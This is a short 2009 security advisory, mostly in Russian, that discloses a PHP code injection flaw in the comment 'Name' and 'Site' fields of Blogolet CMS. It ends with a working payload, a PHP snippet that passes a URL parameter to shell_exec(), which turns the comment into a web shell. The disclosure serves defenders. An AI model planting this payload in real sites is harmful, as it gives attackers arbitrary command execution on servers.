[ONSEC-09-017] Blogolet PHP including

2009-09-28T00:00:00
ID SECURITYVULNS:DOC:22528
Type securityvulns
Reporter Securityvulns
Modified 2009-09-28T00:00:00

Description

[ONSEC-09-017] Blogolet PHP including Цель: Blogolet CMS Тип: PHP инъекция Угроза: Высокая Дата обнаружения: 21.09.2009 Дата оповещения разработчика: 21.09.2009 Дата выхода исправления: 21.09.2009 Автор: Vladimir Vorontsov OnSec Russian Security Group (onsec [dot] ru) Описание: Уязвимость существует из-за отсутствия фильтрации специальных символов в поле Имя при отправке комментария. В результате, при просмотре страницы, сервер обработает php код злоумышленника. Как частный случай, возможно использование встроенной функции shell_exec() для выполнения произвольных команд ОС. Уязвимость носит критический характер.

Реализация:

На странице

http://localhost/pervaya-zapis-v-bloge/#comments

в поле "Имя" или "Сайт" введите

imya<?php echo "ONsec.ru russian security team".shell_exec($_GET["cmd"]);?>